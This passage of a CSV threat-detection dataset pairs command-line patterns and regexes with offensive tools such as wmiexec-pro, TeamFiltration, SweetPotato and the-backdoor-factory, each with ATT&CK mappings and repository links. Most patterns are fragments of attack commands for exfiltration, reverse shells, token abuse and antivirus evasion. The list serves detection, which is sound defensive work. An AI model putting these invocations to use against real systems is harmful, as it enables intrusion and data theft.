Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "* exec * --pid * --command *",".{0,1000}\sexec\s.{0,1000}\s\-\-pid\s.{0,1000}\s\-\-command\s.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "* exec -dll *.dll -config *.config*",".{0,1000}\sexec\s\-dll\s.{0,1000}\.dll\s\-config\s.{0,1000}\.config.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "* exec-command -clear*",".{0,1000}\sexec\-command\s\-clear.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* exec-command -command *",".{0,1000}\sexec\-command\s\-command\s.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* exec-command -shell*",".{0,1000}\sexec\-command\s\-shell.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* -exec-shellcode *",".{0,1000}\s\-exec\-shellcode\s.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "* execute *NT AUTHORITY\SYSTEM*cmd /c *",".{0,1000}\sexecute\s.{0,1000}NT\sAUTHORITY\\SYSTEM.{0,1000}cmd\s\/c\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "* execute NT AUTHORITY\SYSTEM* cmd true bypass*",".{0,1000}\sexecute\sNT\sAUTHORITY\\SYSTEM.{0,1000}\scmd\strue\sbypass.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "* execute_shellcode.exe*",".{0,1000}\sexecute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --execution false --save True --output *.bin*",".{0,1000}\s\-\-execution\sfalse\s\-\-save\sTrue\s\-\-output\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "* exegol.apk*",".{0,1000}\sexegol\.apk.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* exegol.py*",".{0,1000}\sexegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* exe-selfdelete*",".{0,1000}\sexe\-selfdelete.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "* --exfil --cookie-dump * --all*",".{0,1000}\s\-\-exfil\s\-\-cookie\-dump\s\s.{0,1000}\s\-\-all.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --cookie-dump *",".{0,1000}\s\-\-exfil\s\-\-cookie\-dump\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --teams --owa --owa-limit*",".{0,1000}\s\-\-exfil\s\-\-teams\s\-\-owa\s\-\-owa\-limit.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --teams --owa*",".{0,1000}\s\-\-exfil\s\-\-teams\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --tokens * --onedrive --owa*",".{0,1000}\s\-\-exfil\s\-\-tokens\s.{0,1000}\s\-\-onedrive\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --exfil --tokens * --onedrive*",".{0,1000}\s\-\-exfil\s\-\-tokens\s.{0,1000}\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* Exfil.sh*",".{0,1000}\sExfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* exfilGui.ps1*",".{0,1000}\sexfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "* exfiltrate.exe*",".{0,1000}\sexfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "* exocet.go *.exe*",".{0,1000}\sexocet\.go\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "* --exploit=DCOM*",".{0,1000}\s\-\-exploit\=DCOM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --exploit=DCOM*",".{0,1000}\s\-\-exploit\=DCOM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --exploit=EfsRpc*",".{0,1000}\s\-\-exploit\=EfsRpc.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --exploit=PrintSpoofer*",".{0,1000}\s\-\-exploit\=PrintSpoofer.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* --exploit=WinRM*",".{0,1000}\s\-\-exploit\=WinRM.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "* Exrop(*/bin/*",".{0,1000}\sExrop\(.{0,1000}\/bin\/.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "* ExtensionSpoof.exe*",".{0,1000}\sExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "* extract --secrets --zsh*",".{0,1000}\sextract\s\-\-secrets\s\-\-zsh.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "* extract_wifi.exe*",".{0,1000}\sextract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -f *.bin -e AMSI*",".{0,1000}\s\-f\s.{0,1000}\.bin\s\-e\sAMSI.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "* -f *.bin -e Defender*",".{0,1000}\s\-f\s.{0,1000}\.bin\s\-e\sDefender.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "* -f *.exe --encrypt xor --jmp -o *.exe*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-\-encrypt\sxor\s\-\-jmp\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "* -f *.exe -m onionduke -b *.dll*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-m\sonionduke\s\-b\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -f *.exe -m onionduke -b *.exe*",".{0,1000}\s\-f\s.{0,1000}\.exe\s\-m\sonionduke\s\-b\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*",".{0,1000}\s\-f\s.{0,1000}\.ps1\s\-l\s3\s\-o\s.{0,1000}\.ps1\s\-v\s\-t\spowershell.{0,1000}reverse.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -f Find-AllVulns*",".{0,1000}\s\-f\sFind\-AllVulns.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Find-PathDLLHijack*",".{0,1000}\s\-f\sFind\-PathDLLHijack.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*",".{0,1000}\s\-f\sGet\-DomainGroupMember.{0,1000}\s\-a\s.{0,1000}\-Identity\s.{0,1000}admin.{0,1000}\s\-Recurse.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f Invoke-Inveigh*",".{0,1000}\s\-f\sInvoke\-Inveigh.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "* -f kirbi *",".{0,1000}\s\-f\skirbi\s.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* -f nessus.nessus *",".{0,1000}\s\-f\snessus\.nessus\s.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "* -f passw -e xlsx csv *",".{0,1000}\s\-f\spassw\s\-e\sxlsx\scsv\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* -f passw user admin account network login logon cred *",".{0,1000}\s\-f\spassw\suser\sadmin\saccount\snetwork\slogin\slogon\scred\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* -f psexec.exe -H * -P * -s reverse_shell_tcp*",".{0,1000}\s\-f\spsexec\.exe\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\sreverse_shell_tcp.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -f raw -e none -o Nova_MSG.bin*",".{0,1000}\s\-f\sraw\s\-e\snone\s\-o\sNova_MSG\.bin.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "* -f shells/generic1.ps1 *",".{0,1000}\s\-f\sshells\/generic1\.ps1\s.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*",".{0,1000}\s\-f\stcpview\.exe\s\-s\siat_reverse_tcp_inline\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-m\sautomatic\s\-C.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -f TeamViewer.exe -H * -P * -s *",".{0,1000}\s\-f\sTeamViewer\.exe\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\s.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* fake small keys before real ones""*",".{0,1000}\sfake\ssmall\skeys\sbefore\sreal\sones\"".{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "* --fakealias www.fake.com*",".{0,1000}\s\-\-fakealias\swww\.fake\.com.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* -FakeCmdLine *",".{0,1000}\s\-FakeCmdLine\s.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "* -FakeCmdLine *",".{0,1000}\s\-FakeCmdLine\s.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "* -FakeDC * -SamAccountName * -Username *",".{0,1000}\s\-FakeDC\s.{0,1000}\s\-SamAccountName\s.{0,1000}\s\-Username\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --fakedomains *",".{0,1000}\s\-\-fakedomains\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* -fake-hostname *",".{0,1000}\s\-fake\-hostname\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* --fakeip *",".{0,1000}\s\-\-fakeip\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* --fakeipv6 *",".{0,1000}\s\-\-fakeipv6\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool 